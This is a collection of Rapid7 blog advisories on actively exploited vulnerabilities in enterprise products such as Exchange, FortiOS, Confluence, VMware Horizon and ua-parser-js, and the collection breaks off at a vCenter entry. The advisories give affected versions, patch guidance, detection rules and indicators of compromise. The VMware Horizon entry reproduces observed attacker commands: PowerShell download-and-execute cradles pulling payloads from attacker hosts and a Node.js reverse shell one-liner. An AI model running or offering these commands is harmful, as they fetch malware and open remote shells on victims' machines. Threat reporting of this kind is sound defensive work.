All posts by Glenn Thorpe

CVE-2022-21587: Rapid7 Observed Exploitation of Oracle E-Business Suite Vulnerability

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/

CVE-2022-21587: Rapid7 Observed Exploitation of Oracle E-Business Suite Vulnerability

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

Rapid7 is responding to various compromises arising from the exploitation of CVE-2022-21587, a critical arbitrary file upload vulnerability (rated 9.8 on the CVSS v3 risk metric) impacting Oracle E-Business Suite (EBS). Oracle published a Critical Patch Update Advisory in October 2022 which included a fix, meanwhile, CISA added CVE-2022-21587 to its Known Exploited Vulnerabilities (KEV) catalog on February 2, 2023.

Oracle E-Business Suite is a packaged collection of enterprise applications for a wide variety of tasks such as customer relationship management (CRM), enterprise resource planning (ERP), and human capital management (HCM).

CVE-2022-21587 can lead to unauthenticated remote code execution.

On January 16, 2023, Viettel Security published an analysis of the issue detailing both the vulnerability’s root cause and a method of leveraging the vulnerability to gain code execution. An exploit based on the Viettel Security analysis technique was published on GitHub by “HMs” on February 6, 2023.

Affected products

  • Oracle Web Applications Desktop Integrator as shipped with Oracle E-Business Suite versions 12.2.3 through 12.2.11 are vulnerable.

What we’re seeing

The attacker(s) are using the above-mentioned proof of concept exploit, uploading a perl script, which fetches (via curl/wget) additional scripts to download a malicious binary payload making the victim host part of a botnet.

Rapid7 customers

InsightVM & Nexpose customers: Authenticated vulnerability checks for CVE-2022-21587 have been available since November 2022. Note that these require valid Oracle Database credentials to be configured in order to collect the relevant patch level information.

InsightIDR & Managed Detection & Response (MDR) customers: in our current investigations, the previously existing detections have been triggering post exploitation:

  • Suspicious Process - Wget to External IP Address
  • Attacker Technique - Curl or Wget To Public IP Address With Non Standard Port

We’re also testing new rules more specific to Oracle E-Business Suite.

CVE-2022-47966: Rapid7 Observed Exploitation of Critical ManageEngine Vulnerability

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2023/01/19/etr-cve-2022-47966-rapid7-observed-exploitation-of-critical-manageengine-vulnerability/

CVE-2022-47966: Rapid7 Observed Exploitation of Critical ManageEngine Vulnerability

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

Rapid7 is responding to various compromises arising from the exploitation of CVE-2022-47966, a pre-authentication remote code execution (RCE) vulnerability impacting at least 24 on-premise ManageEngine products. CVE-2022-47966 stems from a vulnerable third-party dependency on Apache Santuario.
Several of the affected products are extremely popular with organizations and attackers, including ADSelfService Plus and ServiceDesk Plus. Patches were released in October and November of 2022; the exact timing of fixed version releases varies by product.

Organizations using any of the affected products listed in ManageEngine’s advisory should update immediately and review unpatched systems for signs of compromise, as exploit code is publicly available and exploitation has already begun.

Affected products

See ManageEngine’s advisory for CVE-2022-47966 for updated product and version information.

At the time of publication, the vulnerable products are subject to certain caveats according to Zoho’s advisory.

The following list of vulnerable products is subject to the caveats below:
* Vulnerable if configured SAML-based SSO and it is currently active.
** Vulnerable if configured SAML-based SSO at least once in the past, regardless of the current SAML-based SSO status.

  • Access Manager Plus*
  • Active Directory 360**
  • ADAudit Plus**
  • ADManager Plus**
  • ADSelfService Plus**
  • Analytics Plus*
  • Application Control Plus*
  • Asset Explorer**
  • Browser Security Plus*
  • Device Control Plus*
  • Endpoint Central*
  • Endpoint Central MSP*
  • Endpoint DLP*
  • Key Manager Plus*
  • OS Deployer*
  • PAM 360*
  • Password Manager Pro*
  • Patch Manager Plus*
  • Remote Access Plus*
  • Remote Monitoring and Management (RMM)*
  • ServiceDesk Plus**
  • ServiceDesk Plus MSP**
  • SupportCenter Plus**
  • Vulnerability Manager Plus*

Background

ManageEngine released patches for these products in October and November of 2022.

Rapid7 observed exploitation across organizations as early as January 18, 2023.

Security firm Horizon3 released technical information with a proof of concept (PoC) on January 19, 2023.

Rapid7 customers

InsightVM & Nexpose customers: Our researchers are currently evaluating the feasibility of adding vulnerability checks for as many of the affected products as possible. We expect coverage for ManageEngine ServiceDesk Plus to be available in the January 19 content release.

InsightIDR & Managed Detection & Response customers: the previously existing detections have been triggering upon exploitation:

  • Suspicious Process – Zoho ManageEngine Spawns Child
  • Attacker Technique – Plink Redirecting RDP
  • Attacker Technique – Renamed Plink

CVE-2022-41080, CVE-2022-41082: Rapid7 Observed Exploitation of `OWASSRF` in Exchange for RCE

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/

CVE-2022-41080, CVE-2022-41082: Rapid7 Observed Exploitation of `OWASSRF` in Exchange for RCE

Beginning December 20, 2022, Rapid7 has responded to an increase in the number of Microsoft Exchange server compromises. Further investigation aligned these attacks to what CrowdStrike is reporting as “OWASSRF”, a chaining of CVE-2022-41080 and CVE-2022-41082 to bypass URL rewrite mitigations that Microsoft provided for ProxyNotShell allowing for remote code execution (RCE) via privilege escalation via Outlook Web Access (OWA).

Patched servers do not appear vulnerable, servers only utilizing Microsoft’s mitigations do appear vulnerable.

Threat actors are using this to deploy ransomware.

Rapid7 recommends that organizations who have yet to install the Exchange update (KB5019758) from November 2022 should do so immediately and investigate systems for indicators of compromise. Do not rely on the rewrite mitigations for protection.

Affected Products

The following on-prem versions of Exchange that have not applied the November 8, 2022 KB5019758 update are vulnerable:

  • Microsoft Exchange Server 2013
  • Microsoft Exchange Server 2016
  • Microsoft Exchange Server 2019

IOCs

In addition to the detection rules included in InsightIDR for Rapid7 customers, other IOCs include:

  • PowerShell spawned by IIS (‘w3wp.exe’) creating outbound network connections
  • 45.76.141[.]84
  • 45.76.143[.]143

Example command being spawned by IIS (w3wp.exe):

CVE-2022-41080, CVE-2022-41082: Rapid7 Observed Exploitation of `OWASSRF` in Exchange for RCE

Decoded command where the highlighted string (0x2d4c8f8f) is the hex representation of the IP address 45.76.143[.]143

CVE-2022-41080, CVE-2022-41082: Rapid7 Observed Exploitation of `OWASSRF` in Exchange for RCE

Rapid7 Customers

Customers already have coverage to assist in assessing exposure to and detecting exploitation of this threat.

InsightVM and Nexpose

InsightVM and Nexpose added checks for CVE-2022-41080 and CVE-2022-41082 on November 8, 2022.

InsightIDR

InsightIDR customers can look for the alerting of the following rules, typically seeing several (or all) triggered on a single executed command:

  • Attacker Technique – PowerShell Registry Cradle
  • Suspicious Process – PowerShell System.Net.Sockets.TcpClient
  • Suspicious Process – Exchange Server Spawns Process
  • PowerShell – Obfuscated Script
  • Webshell – IIS Spawns PowerShell
    Additional detections currently being observed with follow-on activity in these compromises include:
  • Attacker Technique – Plink Redirecting RDP
  • Attacker Technique – Renamed Plink
  • Suspicious Process – Started From Users Music Directory

Managed Detection & Response customers

Your customer advisor will reach out to you right away if any suspicious activity is observed in your organization.

Eoin Miller contributed to this article.

CVE-2022-27518: Critical Fix Released for Exploited Citrix ADC, Gateway Vulnerability

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/12/13/cve-2022-27518-critical-fix-released-for-exploited-citrix-adc-gateway-vulnerability/

CVE-2022-27518: Critical Fix Released for Exploited Citrix ADC, Gateway Vulnerability

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

On Tuesday, December 13, 2022, Citrix published Citrix ADC and Citrix Gateway Security Bulletin for CVE-2022-27518 announcing fixes for a critical unauthenticated remote code execution (RCE) vulnerability that exists in certain configurations of its Gateway and ADC products. This vulnerability has reportedly been exploited in the wild by state-sponsored threat actors.

In a blog post, Citrix states that no workarounds are available for this vulnerability and that customers running an impacted version (those with a SAML SP or IdP configuration) should update immediately.

Citrix is a high-value target for any capable attacker; earlier today, the National Security Agency (NSA) published Citrix ADC Threat Hunting Guidance warning that Citrix ADC is being targeted by state-sponsored adversaries.

Affected products

The following customer-managed product versions are affected by this vulnerability so long as the ADC or Gateway is configured as a SAML SP or a SAML IdP:

  • Citrix ADC and Citrix Gateway 13.0 before 13.0-58.32
  • Citrix ADC and Citrix Gateway 12.1 before 12.1-65.25
  • Citrix ADC 12.1-FIPS before 12.1-55.291
  • Citrix ADC 12.1-NDcPP before 12.1-55.291

Citrix’s blog post also contains information on how to determine if your configuration is a SAML SP or a SAML IdP.

Mitigation guidance

No workarounds are available; impacted organizations should update to one of the following versions on an emergency basis:

  • Citrix ADC and Citrix Gateway 13.0-58.32 and later releases of 13.0
  • Citrix ADC and Citrix Gateway 12.1-65.25 and later releases of 12.1
  • Citrix ADC 12.1-FIPS 12.1-55.291 and later releases of 12.1-FIPS
  • Citrix ADC 12.1-NDcPP 12.1-55.291 and later releases of 12.1-NDcPP

Rapid7 customers

InsightVM customers will be able to assess their exposure to CVE-2022-27518 with the content release scheduled for December 13, 2022.

CVE-2022-42475: Unauthenticated Remote Code Execution Vulnerability in FortiOS; Exploitation Reported

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/12/12/cve-2022-42475-unauthenticated-remote-code-execution-vulnerability-in-fortios-exploitation-reported/

CVE-2022-42475: Unauthenticated Remote Code Execution Vulnerability in FortiOS; Exploitation Reported

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

Today, December 12, 2022, FortiGuard Labs published advisory FG-IR-22-398 regarding a “heap-based buffer overflow vulnerability [CWE-122] in FortiOS SSL-VPN [which] may allow a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.”

FortiGuard Labs has confirmed at least one instance of the vulnerability being exploited in the wild and included the current indicators of compromise (IOCs) for FortiOS administrators to utilize in reviewing the integrity of current vulnerable systems in their advisory.

Vulnerabilities of this nature, and on this type of system, have proven to be of high value to attackers. We strongly advise that organizations upgrade to an unaffected version of FortiOS on an emergency basis and follow FortiGuard’s advice to review existing systems for signs of compromise.

Affected products

  • FortiOS version 7.2.0 through 7.2.2
  • FortiOS version 7.0.0 through 7.0.8
  • FortiOS version 6.4.0 through 6.4.10
  • FortiOS version 6.2.0 through 6.2.11
  • FortiOS-6K7K version 7.0.0 through 7.0.7
  • FortiOS-6K7K version 6.4.0 through 6.4.9
  • FortiOS-6K7K version 6.2.0 through 6.2.11
  • FortiOS-6K7K version 6.0.0 through 6.0.14

Solutions

  • Please upgrade to FortiOS version 7.2.3 or above
  • Please upgrade to FortiOS version 7.0.9 or above
  • Please upgrade to FortiOS version 6.4.11 or above
  • Please upgrade to FortiOS version 6.2.12 or above
  • Please upgrade to FortiOS-6K7K version 7.0.8 or above
  • Please upgrade to FortiOS-6K7K version 6.4.10 or above
  • Please upgrade to FortiOS-6K7K version 6.2.12 or above
  • Please upgrade to FortiOS-6K7K version 6.0.15 or above

Rapid7 customers

Vulnerability checks for CVE-2022-42475 are under development and will be available to InsightVM and Nexpose customers in an upcoming content release.

CVE-2022-40684: Remote Authentication Bypass Vulnerability in Fortinet Firewalls, Web Proxies

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/10/07/cve-2022-40684-remote-authentication-bypass-vulnerability-in-fortinet-firewalls-web-proxies/

CVE-2022-40684: Remote Authentication Bypass Vulnerability in Fortinet Firewalls, Web Proxies

Emergent threats evolve quickly, and as we learn more about this vulnerability, this blog post will evolve, too.

On October 3, 2022, Fortinet released a software update that indicates then-current versions of their FortiOS (firewall) and FortiProxy (web proxy) software are vulnerable to CVE-2022-40684, a critical vulnerability that allows remote, unauthenticated attackers to bypass authentication and gain access to the administrative interface of these products with only a specially crafted http/s request.

According to communications from Fortinet that were shared on social media, Fortinet “is strongly recommending all customers with vulnerable versions to perform an immediate upgrade.”

Affected products

  • FortiOS 7.0.0 to 7.0.6
  • FortiOS 7.2.0 to 7.2.1
  • FortiProxy 7.0.0 to 7.0.6 and 7.2.0

Remediation

On Thursday, October 6, 2022, Fortinet released version 7.0.7 and version 7.2.2, which resolve the vulnerability.

Along with Fortinet, Rapid7 strongly recommends that organizations who are running an affected version of the software upgrade to 7.07 or 7.2.2 immediately, on an emergency basis. These products are edge devices, which are high-value and high-focus targets for attackers looking to gain internal network access. While Rapid7 is not currently aware of exploitation in the wild for this vulnerability, using prior FortiOS vulnerabilities as in indicator (such as CVE-2018-13379) we expect attackers to focus on CVE-2022-40684 quickly and for quite some time.

Furthermore, Rapid7 recommends that all high-value edge devices limit public access to any administrative interface.

Rapid7 customers

InsightVM/Nexpose customers: Our researchers are currently working on adding vulnerability check(s).

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/07/27/active-exploitation-of-atlassians-questions-for-confluence-app-cve-2022-26138/

Active Exploitation of Atlassian’s Questions for Confluence App CVE-2022-26138

Exploitation is underway for one of the trio of critical Atlassian vulnerabilities that were published last week affecting several the company’s on-premises products. Atlassian has been a focus for attackers, as it was less than two months ago that we observed exploitation of CVE-2022-26134 in Confluence Server and Confluence Data Center.

CVE-2022-26138: Hardcoded password in Questions for Confluence app impacting:

  • Confluence Server
  • Confluence Data Center

CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities impacting:

  • Bamboo Server and Data Center
  • Bitbucket Server and Data Center
  • Confluence Server and Data Center
  • Crowd Server and Data Center
  • Crucible
  • Fisheye
  • Jira Server and Data Center
  • Jira Service Management Server and Data Center

CVE-2022-26138: Hardcoded password in Questions for Confluence app

The most critical of these three is CVE-2022-26138, as it was quickly exploited in the wild once the hardcoded password was released on social media. There is a limiting function here, however, as this vulnerability only exists when the Questions for Confluence app is enabled (and does not impact the Confluence Cloud instance). Once the app is enabled on affected versions, it will create a user account with a hardcoded password and add the account to a user group, which allows access to all non-restricted pages in Confluence. This easily allows a remote, unauthenticated attacker to browse an organization’s Confluence instance. Unsurprisingly, it didn’t take long for Rapid7 to observe exploitation once the hardcoded credentials were released, given the high value of Confluence for attackers who often jump on Confluence vulnerabilities to execute ransomware attacks.

Affected versions

  • Questions for Confluence 2.7.x

    • 2.7.34
    • 2.7.35
  • Questions for Confluence

    • 3.0.x
    • 3.0.2

Mitigation guidance

Organizations using on-prem Confluence should follow Atlassian’s guidance on updating their instance or disabling/deleting the account. Rapid7 recommends organizations impacted by this take steps immediately to mitigate the vulnerability. Atlassian’s advisory also includes information on how to look for evidence of exploitation. An FAQ has also been provided.

Please note: Atlassian’s Questions For Confluence Security Advisory 2022-07-20 has a very important call-out that “uninstalling the Questions for Confluence app does not remediate this vulnerability.”

CVE-2022-26136 & CVE-2022-26137: Multiple Servlet Filter vulnerabilities

Two other vulnerabilities were announced at the same time, CVE-2022-26136 and CVE-2022-26137, which are also rated critical by Atlassian. They both are issues with Servlet Filters in Java and can be exploited by remote, unauthenticated attackers. Cloud versions of Atlassian have already been fixed by the company.

The list of affected versions is long and can be found on Atlassian’s Security Advisory.

While the impact of these vulnerabilities will vary by organization, as mentioned above, attackers place a high value on many Atlassian products. Therefore, Rapid7 recommends that organizations update impacted product versions as there is no mitigation workaround available.

Rapid7 customers

InsightVM and Nexpose: Our engineering team is investigating the feasibility of a vulnerability check to help InsightVM and Nexpose customers assess exposure to CVE-2022-26138.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Active Exploitation of VMware Horizon Servers

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2022/01/18/active-exploitation-of-vmware-horizon-servers/

Active Exploitation of VMware Horizon Servers

This post is co-authored by Charlie Stafford, Lead Security Researcher.

Summary

Attackers are actively targeting VMware Horizon servers vulnerable to Apache Log4j CVE-2021-44228 (Log4Shell) and related vulnerabilities that were patched in December 2021. We’re sharing our observed activities and indicators of compromise (IOCs) related to this activity.

Details

Beginning Friday, January 14, 2022, Rapid7 Managed Detection & Response (MDR) began monitoring a sudden increase in VMware Horizon exploitation. The activity our teams are observing is similar to observed threat activity detailed by NHS Digital. Rapid7 services and research teams expect to see a continued strong upward trend in attacker activity directed at VMware Horizon instances vulnerable to Log4Shell exploits.

Rapid7 customers

Rapid7 InsightIDR and MDR customers: Alerts generated by the following detection rules can assist in identifying successful VMware Horizon exploitation:

  • Attacker Technique – PowerShell Download Cradles (created: Thursday, January 3, 2019, 15:31:27 UTC)
  • Suspicious Process – VMWare Horizon Spawns CMD or PowerShell (created: Thursday, January 6, 2022, 14:18:21 UTC)

Rapid7 researchers are currently evaluating the feasibility of adding a VMware Horizon vulnerability check for Nexpose/InsightVM.

We have a dedicated resource page for the Log4j vulnerability, which includes our AttackerKB analysis of Log4Shell containing a proof-of-concept exploit for VMware Horizon.

Recommendations

Patch Immediately: Organizations that still have a vulnerable version of VMware Horizon in their environment should update to a patched version of Horizon on an emergency basis and review the system(s) for signs of compromise. As a general practice, Rapid7 recommends never exposing VMware Horizon to the public internet, only allowing access behind a VPN.

Organizations are advised to proactively block traffic to the IPs/URLs listed in the IOCs section.

Observed activities

Rapid7’s Threat Intelligence and Detection Engineering (TIDE) team has identified five unique avenues that attackers have taken post-exploitation, indicating that multiple actors are involved in this mass exploitation activity.

The most common activity sees the attacker executing PowerShell and using the built-in System.Net.WebClient object to download cryptocurrency mining software to the system.

TIDE has observed the attacker downloading cryptocurrency miners from the following URLs:

  • http://72.46.52[.]135/mad_micky.bat
  • http://80.71.158[.]96/xms.ps1
  • http://101.79.1[.]118/2.ps1

The following is an example PowerShell command from this activity (note that these contents were originally base64 encoded):

$wc = New-Object System.Net.WebClient; $tempfile = [System.IO.Path]::GetTempFileName(); $tempfile += '.bat'; $wc.DownloadFile('http://72.46.52[.]135/mad_micky.bat', $tempfile); & $tempfile

The System.Net.WebClient download cradle has also been used by one unknown actor to deploy a reverse shell based on Invoke-WebRev (https://raw.githubusercontent.com/3v4Si0N/HTTP-revshell/master/Invoke-WebRev.ps1) from http://87.121.52[.]221:443/dd.ps1. Another actor has used it to download a Cobalt Strike backdoor from http://185.112.83[.]116:8080/drv. This backdoor was created using the trial version of Cobalt Strike, meaning it contains the EICAR anti-virus test string which should be identified by any AV vendor.

One actor attempts to use System.Net.WebClient to download a rudimentary backdoor from http://0.tcp.ngrok[.]io:18765/qs.exe. If this method fails, the PowerShell BitsTransfer object is used as a backup download method. In this instance, the actor is using ngrok[.]io URLs. NGrok is a tool that allows a user to tunnel traffic through a NAT or firewall. The backdoor communicates with http://2.tcp.ngrok[.]io:19969/index.php and will execute PowerShell commands received from that host.

Example command from this activity:

$a="http://0.tcp.ngrok[.]io:18765/qs.exe";$b="c:\windows\temp\qs.exe";$c = "c:\users\public\qs.exe";Import-Module BitsTransfer;try{(New-Object System.Net.WebClient).DownloadFile($a, $b);Start-Process -FilePath $b;exit;}catch{};try{Start-BitsTransfer -Source $a -Destination $b;Start-Process -FilePath $b;exit;}catch{};try{(New-Object System.Net.WebClient).DownloadFile($a, $c);Start-Process -FilePath $c;exit;}catch{};try{Start-BitsTransfer -Source $a -Destination $c;Start-Process -FilePath $c;exit;}catch{}

The final method TIDE has observed at Rapid7 customers involves the attacker using the copy of Node included with the VMWare server at C:\Program Files\VMware\VMware View\Server\appblastgateway\node.exe. Node is used to execute a small snippet of JavaScript code that establishes a reverse shell to 146.59.130.58:

C:\"Program Files"\VMware\"VMware View"\Server\appblastgateway\node.exe -r net -e "sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(4460, '146.59.130.58', function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});"

Indicators of compromise (IOC)

The full list of IOCs that TIDE has observed related to this activity is as follows:

  • 72.46.52[.]135

    • mad_micky.bat
    • 58e22726592ec5ab6ca49eda2fdb7017
  • 80.71.158[.]96

    • xms.ps1
    • e397087edf21ad9da907b595691ce15e
  • 101.79.1[.]118

    • 2.ps1
    • 6422ede9aadd1a768cb57fe06c1155ad
  • 87.121.52[.]221

    • dd.ps1
    • f7d5a47321e436fe33e03c4dbf29bd92
  • 185.112.83[.]116

    • drv
    • 00a4e6f11d2dae5146995aa489292677
  • 0.tcp.ngrok[.]io:18765

  • 2.tcp.ngrok[.]io:19969

    • qs.exe
    • 1fcf790cc9c66794ae93c114c61b412e
  • 146.59.130.58

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Patch Now: Sonicwall Fixes Multiple Vulnerabilities in SMA 100 Devices

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/12/08/patch-now-sonicwall-fixes-multiple-vulnerabilities-in-sma-100-devices/

Summary

Patch Now: Sonicwall Fixes Multiple Vulnerabilities in SMA 100 Devices

On December 7, 2021, Sonicwall released a security advisory that includes patching guidance for five vulnerabilities in SonicWall SMA 100 series devices that were discovered by Rapid7 (including CVE-2021-20038 which is rated CVSSv3 9.8, critical), as well as several other CVEs discovered by NCC Group. While exploitation has not yet started for these vulnerabilities, SonicWall “strongly urges” organizations to apply the appropriate patches.

From Sonicwall’s advisory:

Issue ID Summary CVE CVSS Reporting Party Impacted Versions
SMA-3217 Unauthenticated Stack-Based Buffer Overflow CVE-2021-20038 9.8 Rapid7 10.2.0.8-37sv, 10.2.1.1-19sv, 10.2.1.2-24sv
SMA-3204 Authenticated Command Injection CVE-2021-20039 7.2 Rapid7 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3206 Unauthenticated File Upload Path Traversal CVE-2021-20040 6.5 Rapid7, NCCGroup 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3207 Unauthenticated CPU Exhaustion CVE-2021-20041 7.5 Rapid7 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3208 Unauthenticated Confused Deputy CVE-2021-20042 6.3 Rapid7 9.0.0.11-31sv, 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3231 Heap-Based Buffer Overflow CVE-2021-20043 8.8 NCCGroup 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3233 Post-Authentication Remote Command Execution CVE-2021-20044 7.2 NCCGroup 10.2.0.8-37sv, 10.2.1.1-19sv
SMA-3235 Multiple Unauthenticated Heap-Based and Stack Based Buffer Overflow CVE-2021-20045 9.4 NCCGroup 10.2.0.8-37sv, 10.2.1.1-19sv

Affected versions

The issues listed above impact SMA 100 series appliances (SMA 200, 210, 400, 410, 500v).

Full disclosure scheduled for January 2022

Rapid7 will release the technical details and proof-of-concept code in January 2022 as part of our coordinated vulnerability disclosure process.

Guidance

As with all critical, network-edge appliances, Rapid7 recommends that vulnerabilities be patched immediately. SonicWall devices have previously been exploited at scale in 2021 and are generally high-value targets for attackers. Sonicwall does not list any workarounds for these issues. For more information, see SonicWall’s advisory.

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to all eight of the CVEs in this advisory with vulnerability checks in the December 7, 2021 content release.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Oh No, Zoho: Active Exploitation of CVE-2021-44077 Allowing Unauthenticated Remote Code Execution

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/12/07/oh-no-zoho-active-exploitation-of-cve-2021-44077-allowing-unauthenticated-remote-code-execution/

CVE Vendor Advisory AttackerKB IVM Content Patching Urgency Last Update
CVE-2021-44077 Zoho’s Advisory In Progress Under Evaluation Immediately December 7, 2021 5:00pm ET

Summary

Oh No, Zoho: Active Exploitation of CVE-2021-44077 Allowing Unauthenticated Remote Code Execution

Zoho customers have had a huge incentive lately to keep their software up to date, as recent Zoho critical vulnerabilities have been weaponized shortly after release by advanced attackers. (Rapid7 blogged as recently as November 9, 2021, about the Exploitation of Zoho ManageEngine). This trend continues with CVE-2021-44077, an unauthenticated remote code execution vulnerability affecting several of their products. To assist their customers, Zoho has since set up an online security response plan that includes an exploit detection tool to see if an organization’s installation is compromised.

Affected versions:

  • ManageEngine ServiceDesk Plus, prior to version 11306
  • ServiceDesk Plus MSP, prior to version 10530
  • SupportCenter Plus, prior to version 11014

Details

On September 16, 2021, Zoho released a Security Advisory urging customers to upgrade their software in order to resolve an authentication bypass vulnerability. 67 days later, on November 22, 2021, they released an additional advisory for the 44077 CVE indicating that the previously mentioned update also fixed a remote code execution (RCE) vulnerability that is being exploited in the wild.

Last week, CISA released an alert detailing attacker tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs). CVE-2021-44077 has also been added to CISA’s known exploited vulnerabilities catalog with a required remediation date of December 15, 2021, for US federal agencies.

Guidance

Rapid7 advises organizations that utilize any of the impacted versions listed above patch on an emergency basis, utilize Zoho’s exploit detection tool, and review CISA’s documentation of IOCs to determine whether a specific installation has been compromised. Additionally, we recommend that access to these products should exist behind a VPN and organizations immediately stay up to date on software versions. Attackers have had enough critical vulnerabilities of late to build a bit of a skillset in understanding how the Zoho software works, so future vulnerabilities will only be exploited even faster.

Rapid7 customers

InsightVM and Nexpose customers:
Our researchers are currently evaluating the feasibility of adding a vulnerability check.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Ongoing Exploitation of Windows Installer CVE-2021-41379

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/11/30/ongoing-exploitation-of-windows-installer-cve-2021-41379/

Ongoing Exploitation of Windows Installer CVE-2021-41379

On November 9, 2021, as part of Patch Tuesday, Microsoft released an update to address CVE-2021-41379, a “Windows Installer Elevation of Privilege Vulnerability” that had a modest CVSS score (5.5), without much fanfare. The original CVE allows an attacker to delete files on a system using elevated privileges.

Fast-forward to November 22, 2021, when after investigating the patch, the researcher that discovered the vulnerability, Abdelhamid Naceri, found that it did not fully remediate the issue and published proof-of-concept (PoC) code on GitHub proving exploitation of the vulnerability is still possible on patched versions of Windows allowing for SYSTEM-level privileges. The working PoC “overwrites Microsoft Edge elevation service ‘DACL’ and copies itself to the service location, then executes it to gain elevated privileges.”

With a zero-day exploit available, attackers have been chipping away at ways to utilize the vulnerability, especially in malware.

As of November 30, 2021, there is not an official patch from Microsoft to fully and effectively remediate this vulnerability. Community researchers and security practitioners have noted that other Microsoft zero-day vulnerabilities this year, such as CVE-2021-36934 (“HiveNightmare”/”SeriousSAM”), were not fixed until typical Patch Tuesday release cycles even if public exploit code had already made an appearance. We expect that this vulnerability will follow that same pattern and that we won’t see a new patch (and/or a new CVE, if Microsoft does indeed classify this as a patch bypass) until December 2021’s Patch Tuesday.

Affected versions

According to the researcher, all supported versions of Windows, including Windows 11 and Server 2022, are vulnerable to the exploit.

Guidance

With no official patch at this time, we recommend that organizations prepare to patch this as soon as the official fix is released. Meanwhile, Rapid7 researchers have confirmed that a number of antimalware programs have added detection of this exploit, so as usual, keep those programs up to date. Lastly, organizations can detect previous exploitation of this PoC by monitoring for EventID 1033 and “test pkg” (keeping in mind that the “test pkg” will only find this exact PoC and may be modified by more enterprising attackers).

Ongoing Exploitation of Windows Installer CVE-2021-41379

Rapid7 customers

For Rapid7 InsightVM customers, we will be releasing vulnerability checks if and when Microsoft publishes patch information for the new vulnerability.

In the meantime, InsightVM customers can use Query Builder to find Windows assets by creating the following query: os.family contains windows. Rapid7 Nexpose customers can create a Dynamic Asset Group based on a filtered asset search for OS contains windows.

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

NPM Library (ua-parser-js) Hijacked: What You Need to Know

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/10/25/npm-library-ua-parser-js-hijacked-what-you-need-to-know/

NPM Library (ua-parser-js) Hijacked: What You Need to Know

For approximately 4 hours on Friday, October 22, 2021, a widely utilized NPM package, ua-parser-js, was embedded with a malicious script intended to install a coinminer and harvest user/credential information. This package is used “to detect Browser, Engine, OS, CPU, and Device type/model from User-Agent data,” with nearly 8 million weekly downloads and 1,200 dependencies.

The malicious package was available for download starting on October 22, 2021, at 12:15 PM GMT, and ending October 22, 2021, between 4:16 PM and 4:26 PM GMT. During that time, 3 versions of the package were compromised with a script that would execute on Windows and Linux machines:

Affected Version Patched Version
0.7.29 0.7.30
0.8.0 0.8.1
1.0.0 1.0.1

Both GitHub and CISA issued advisories urging users to upgrade right away and review systems for suspicious or malicious activity.

Due to the quick reporting of issues by GitHub users and action by the developer, development exposure will be limited to teams who had a pull/build during that (roughly) 4-hour timeframe.

At this time, the source of the attack is unconfirmed. However, with the use of IntSights, recently acquired by Rapid7, a suspicious thread has been identified, created on October 5, 2021, in a prominent Russian hacking forum. There, a threat actor offered access to a developer account of an undisclosed package on npmjs.com, indicating that the package has “more than 7 million installations every week, more than 1,000 others are dependent on this.” With the requested price of $20,000 dollars, the threat actor stated that the account does not have 2-factor authentication.

NPM Library (ua-parser-js) Hijacked: What You Need to Know

While there is no definitive evidence that the compromise of ua-parser-js is related to the above-mentioned dark-web activity, the weekly installs and dependency numbers appear to match and align with the developers’ post of an account hijack.

Rapid7 guidance

Rapid7 recommends development teams immediately heed the advice for organizations to review for the use of these versions and remediate accordingly. Additionally, organizations’ security teams need to be on the lookout for users who visited a site infected with the malicious script. Several anti-malware programs have (or have since added) detections for this, and organizations should keep an eye open for network traffic that is hitting domains/IPs associated with coin mining.

Rapid7 customers

InsightVM

InsightVM users will be able to assess their exposure to malicious versions of the ua-parser-js package via Container Security functionality in an upcoming release. No Scan Engine or Insight Agent-based checks are currently planned.

InsightIDR

InsightIDR customers, including Managed Detection & Response customers, were already equipped with detections that may be indicative of related malicious activity:

  • Cryptocurrency Miner – XMRig
  • Suspicious Process – Curl to External IP Address
  • Wget to External IP Address

Additionally, Rapid7 has updated the following rule to provide additional coverage:

  • Cryptocurrency Miner – Mining Pool URL in Command Line

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)

Post Syndicated from Glenn Thorpe original https://blog.rapid7.com/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/

Description

Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)

